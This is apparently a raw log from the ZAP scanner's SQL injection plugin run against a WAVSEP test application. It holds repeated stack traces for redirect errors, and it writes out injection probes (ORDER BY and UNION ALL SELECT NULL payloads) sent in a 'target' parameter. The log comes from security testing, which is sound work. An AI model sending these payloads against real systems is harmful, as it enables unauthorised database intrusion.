SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688363 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688366 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 2687-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' ORDER BY 2687-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688367 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688368 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688369 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688370 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688371 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688373 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688374 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688376 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688377 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688378 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error 